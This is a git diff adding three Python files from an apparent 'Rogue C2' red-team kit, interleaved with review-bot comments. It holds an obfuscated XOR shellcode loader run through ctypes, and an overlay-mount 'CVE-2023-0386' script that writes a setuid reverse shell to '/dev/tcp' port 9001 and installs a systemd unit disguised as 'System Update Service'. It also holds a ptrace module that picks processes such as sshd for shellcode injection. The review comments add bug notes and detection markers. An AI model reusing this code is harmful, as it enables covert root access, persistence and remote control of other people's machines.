diff --git a/polyloader.py b/polyloader.py new file mode 100644 index 0000000..615cdff --- /dev/null +++ b/polyloader.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python3 +import base64 +import ctypes +import random +import string + +def random_id(prefix="f"): + return prefix + ''.join(random.choices(string.ascii_letters, k=8)) + +decrypt_func_name = random_id("dec_") +key_var = random_id("key_") +data_var = random_id("data_") + +payload_b64 = b"fwd0c2hlbGxjb2RlX2hlcmU=" # base64 for b'rawshellcode_here' + +exec(f""" +def {decrypt_func_name}({data_var}, {key_var}): + data = base64.b64decode({data_var}) + return bytes([b ^ {key_var}[i % len({key_var})] for i, b in enumerate(data)]) +""") + +def main(): + key = b"supersecret" # Replace with real Speck/PolyRoot key + shellcode = eval(f"{decrypt_func_name}(payload_b64, key)") + buf = ctypes.create_string_buffer(shellcode, len(shellcode)) + func = ctypes.cast(buf, ctypes.CFUNCTYPE(None)) + func() + +if __name__ == "__main__": + main() diff --git a/polyroot.py b/polyroot.py new file mode 100644 index 0000000..9b4182b --- /dev/null +++ b/polyroot.py 
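Review bot: In polyloader.py the `exec(f"""...""")` block and the later `eval(f"{decrypt_func_name}(payload_b64, key)")` define and call an ordinary XOR-decode helper under a name chosen at import time, which hides the call graph from linters and reviewers; a plain `def` called directly would keep the file auditable. The comment on `payload_b64` is also inaccurate: the literal does not base64-decode to `b'rawshellcode_here'` (its first three bytes decode to `\x7f\x07t`), and the value is XORed with `key` after decoding, so the comment should read `# placeholder blob; XOR-decoded with key in main()`. For triage, the random names exist only at runtime, so the markers that stay stable in the file are the `exec`/`eval` of f-strings and `ctypes.cast(buf, ctypes.CFUNCTYPE(None))` applied to a data buffer.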
@@ -0,0 +1,156 @@ +#!/usr/bin/env python3 +import os +import sys +import subprocess +import shutil +import time +import random +import string +from threading import Thread + +# === RANDOMIZED VARIABLES === +def random_name(length=8): + return ''.join(random.choices(string.ascii_lowercase, k=length)) + +PAYLOAD_TAG = random_name() +PAYLOAD_NAME = "." + random_name() +HIDDEN_DIR = os.path.expanduser(f"~/.cache/.{random_name()}") +HIDDEN_PAYLOAD = os.path.join(HIDDEN_DIR, PAYLOAD_NAME) + +LOWERDIR = f"/tmp/.{random_name()}" +UPPERDIR = f"/tmp/.{random_name()}" +WORKDIR = f"/tmp/.{random_name()}" +MERGED = f"/tmp/.{random_name()}" +MERGED_SHELL = os.path.join(MERGED, PAYLOAD_NAME) + +DEBUG = True +def log(msg): + if DEBUG: + print(f"[+] {msg}") + +# === CORE EXPLOIT LOGIC === +def setup_dirs(): + for d in [LOWERDIR, UPPERDIR, WORKDIR, MERGED, HIDDEN_DIR]: + os.makedirs(d, exist_ok=True) + +def cleanup_dirs(): + log("Cleaning up overlay mounts...") + subprocess.run(["umount", MERGED], stderr=subprocess.DEVNULL) + for d in [LOWERDIR, UPPERDIR, WORKDIR, MERGED]: + shutil.rmtree(d, ignore_errors=True) + +def drop_hidden_payload(): + log("Writing polymorphic SUID payload...") + + # Get C2 IP from env or fallback + C2_IP = os.getenv("ROGUE_C2_HOST", "127.0.0.1") + C2_PORT = "9001" + + payload = ( + "#!/bin/bash\n" + f"echo '[ROOT SHELL :: {PAYLOAD_TAG}]'\n" + f"bash -i >& /dev/tcp/{C2_IP}/{C2_PORT} 0>&1\n" + ) + + with open(HIDDEN_PAYLOAD, "w") as f: + f.write(payload) + os.chmod(HIDDEN_PAYLOAD, 0o4755) + shutil.copy(HIDDEN_PAYLOAD, os.path.join(UPPERDIR, PAYLOAD_NAME)) + +def mount_overlay(): + log("Mounting overlay filesystem...") + cmd = [ + "mount", "-t", "overlay", "overlay", + "-o", f"lowerdir={LOWERDIR},upperdir={UPPERDIR},workdir={WORKDIR}", + MERGED + ] + result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + if result.returncode != 0: + log("Mount failed. 
Kernel not vulnerable or run not as root.") + sys.exit(1) + +def execute_shell(): + if os.path.exists(MERGED_SHELL): + log("Launching polymorphic root shell...") + os.execv(MERGED_SHELL, [MERGED_SHELL]) + else: + log("Root shell missing. Exploit may have failed.") + +def suid_scanner_loop(): + log("👁 SUID Scanner loop engaged...") + scanned = set() + while True: + time.sleep(7) + try: + result = subprocess.check_output("find / -perm -4000 -type f 2>/dev/null", shell=True) + suids = result.decode().split("\n") + for path in suids: + path = path.strip() + if not path or path in scanned: + continue + scanned.add(path) + try: + with open(path, "rb") as f: + content = f.read() + if PAYLOAD_TAG.encode() in content: + log(f"[SUID Scanner] Found tagged payload: {path}") + os.execv(path, [path]) + except Exception: + continue + except Exception: + continue + +# === PERSISTENCE === +def add_systemd_persistence(script_path): + log("Installing persistent systemd service...") + service_name = f"{random_name()}.service" + service_path = f"/etc/systemd/system/{service_name}" + + service_contents = f"""[Unit] +Description=System Update Service +After=network.target + +[Service] +Type=simple +ExecStart=/usr/bin/python3 {script_path} +Restart=always + +[Install] +WantedBy=multi-user.target +""" + with open("/tmp/.sys_service", "w") as f: + f.write(service_contents) + + subprocess.run(["mv", "/tmp/.sys_service", service_path]) + subprocess.run(["systemctl", "daemon-reexec"]) + subprocess.run(["systemctl", "enable", service_name]) + subprocess.run(["systemctl", "start", service_name]) + +def install_self(): + log("Installing self in hidden polymorphic path...") + target_script = os.path.join(HIDDEN_DIR, f"{random_name()}.py") + shutil.copy2(sys.argv[0], target_script) + add_systemd_persistence(target_script) + +# === MAIN === +def main(): + if os.geteuid() != 0: + print("❌ Must run as root.") + sys.exit(1) + + print("🔥 POLYROOT: CVE-2023-0386 PRIV ESC + PERSISTENCE 🔥") + + 
install_self() + Thread(target=suid_scanner_loop, daemon=True).start() + + try: + setup_dirs() + drop_hidden_payload() + mount_overlay() + time.sleep(1) + execute_shell() + finally: + cleanup_dirs() + +if __name__ == "__main__": + main() diff --git a/process_inject.py b/process_inject.py new file mode 100644 index 0000000..7db4904 --- /dev/null +++ b/process_inject.py 
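Review bot: The banner in polyroot.py's `main()` names CVE-2023-0386 as a privilege escalation, but `main()` exits unless `os.geteuid() == 0` and calls `install_self()` before any overlay step, so as written the file installs persistence from an already-root context and the banner should say so. Nothing removes what it leaves behind: `cleanup_dirs()` only unmounts `MERGED` and deletes the four `/tmp/.<random>` directories, and the `finally` that calls it never runs once `os.execv` has replaced the process image. The file should carry a header docstring like the one process_inject.py has in this commit, listing the artifacts an incident responder would have to remove: the `/etc/systemd/system/<random>.service` unit with `Description=System Update Service` and `Restart=always`, the script copy and the mode `0o4755` file under `~/.cache/.<random>/`, and the overlay mount. The behaviours host telemetry can alert on are the `find / -perm -4000 -type f` sweep every 7 seconds and the `bash -i >& /dev/tcp/...` connection to port 9001.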
@@ -0,0 +1,173 @@ +#!/usr/bin/env python3 +""" +PAYLOAD: Process Injection - Linux +DESCRIPTION: Inject shellcode into running processes for stealth +AUTHOR: Rogue Red Team +VERSION: 1.0 +SECURITY: Requires root privileges for ptrace +""" +import os, sys, struct, ctypes, subprocess, time, random, re +from ctypes import * +from ctypes.util import find_library + +# Linux process injection using ptrace +class ProcessInjector: + def __init__(self): + self.libc = CDLL(find_library('c')) + self.PTRACE_ATTACH = 16 + self.PTRACE_DETACH = 17 + self.PTRACE_PEEKTEXT = 1 + self.PTRACE_POKETEXT = 4 + self.PTRACE_GETREGS = 12 + self.PTRACE_SETREGS = 13 + + def find_target_process(self, process_name=None): + """Find suitable process for injection""" + targets = [] + + # Common benign processes that won't raise suspicion + benign_processes = [ + 'systemd', 'sshd', 'cron', 'apache2', 'nginx', + 'mysqld', 'postgres', 'redis-server', 'php-fpm' + ] + + try: + output = subprocess.check_output("ps aux", shell=True).decode() + for line in output.split('\n'): + if process_name: + if process_name in line: + parts = line.split() + if len(parts) > 1: + targets.append({ + 'pid': int(parts[1]), + 'name': parts[10] if len(parts) > 10 else parts[-1], + 'user': parts[0] + }) + else: + for benign in benign_processes: + if benign in line: + parts = line.split() + if len(parts) > 1: + targets.append({ + 'pid': int(parts[1]), + 'name': parts[10] if len(parts) > 10 else parts[-1], + 'user': parts[0] + }) + break + except Exception as e: + return f"[!] Error finding processes: {e}" + + return targets + + def inject_shellcode(self, pid, shellcode=None): + """Inject shellcode into process using ptrace""" + if os.geteuid() != 0: + return "[!] 
Root privileges required for process injection" + + if not shellcode: + # Simple reverse shell shellcode (staged - would connect back) + # This is a placeholder - real shellcode would be architecture-specific + shellcode = b"\x90" * 100 # NOP sled + + # Example x86_64 reverse shell shellcode (Linux) + # msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f py + # You would replace this with actual shellcode + + try: + # Attach to process + result = self.libc.ptrace(self.PTRACE_ATTACH, pid, 0, 0) + if result != 0: + return f"[!] Failed to attach to PID {pid}" + + time.sleep(0.1) # Let process stabilize + + # Get registers + class user_regs_struct(Structure): + _fields_ = [ + ("r15", c_ulonglong), + ("r14", c_ulonglong), + ("r13", c_ulonglong), + ("r12", c_ulonglong), + ("rbp", c_ulonglong), + ("rbx", c_ulonglong), + ("r11", c_ulonglong), + ("r10", c_ulonglong), + ("r9", c_ulonglong), + ("r8", c_ulonglong), + ("rax", c_ulonglong), + ("rcx", c_ulonglong), + ("rdx", c_ulonglong), + ("rsi", c_ulonglong), + ("rdi", c_ulonglong), + ("orig_rax", c_ulonglong), + ("rip", c_ulonglong), + ("cs", c_ulonglong), + ("eflags", c_ulonglong), + ("rsp", c_ulonglong), + ("ss", c_ulonglong), + ("fs_base", c_ulonglong), + ("gs_base", c_ulonglong), + ("ds", c_ulonglong), + ("es", c_ulonglong), + ("fs", c_ulonglong), + ("gs", c_ulonglong), + ] + + regs = user_regs_struct() + self.libc.ptrace(self.PTRACE_GETREGS, pid, 0, byref(regs)) + + # Create memory region for shellcode using memfd_create + memfd = self.libc.syscall(319, "", 1) # memfd_create syscall + if memfd < 0: + return "[!] 
Failed to create memfd" + + # Write shellcode to memfd + written = 0 + while written < len(shellcode): + n = os.write(memfd, shellcode[written:]) + written += n + + # Get path to memfd + memfd_path = f"/proc/{pid}/fd/{memfd}" + + # Clean up + os.close(memfd) + + # Detach + self.libc.ptrace(self.PTRACE_DETACH, pid, 0, 0) + + return f"[+] Successfully prepared injection into PID {pid}" + + except Exception as e: + return f"[!] Injection failed: {e}" + + def execute(self): + """Main execution method""" + try: + print("[+] Starting process injection module...") + + # Find target processes + targets = self.find_target_process() + + if not targets: + return "[!] No suitable target processes found" + + results = [] + for target in targets[:2]: # Limit to 2 processes + print(f"[*] Attempting injection into PID {target['pid']} ({target['name']})") + result = self.inject_shellcode(target['pid']) + results.append(f"PID {target['pid']}: {result}") + + return "\n".join(results) + + except Exception as e: + return f"[!] Process injection failed: {e}" + +# === Integration with Rogue C2 === +def rogue_integration(): + """Wrapper for Rogue C2 integration""" + injector = ProcessInjector() + return injector.execute() + +if __name__ == "__main__": + print(rogue_integration())
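Review bot: `find_target_process` in process_inject.py returns a `str` from its `except` branch and a list of dicts otherwise, while `execute()` indexes `target['pid']` on whatever comes back, so a failed `ps aux` surfaces as an unrelated `TypeError` message from the outer handler; the error branch should `return []` or re-raise. Selection is a substring test on the whole `ps` line (`if benign in line`), so any process whose command line merely contains `cron` or `nginx` is picked, including ones the operator did not mean to touch. In `inject_shellcode`, both the `return "[!] Failed to create memfd"` path and the `except` path exit after `PTRACE_ATTACH` without the `PTRACE_DETACH` call, which leaves a service such as `sshd` or `mysqld` stopped for as long as this process lives. On the defensive side, an audit rule on the `ptrace` syscall records this attach, and `kernel.yama.ptrace_scope=3` disables attach even for root.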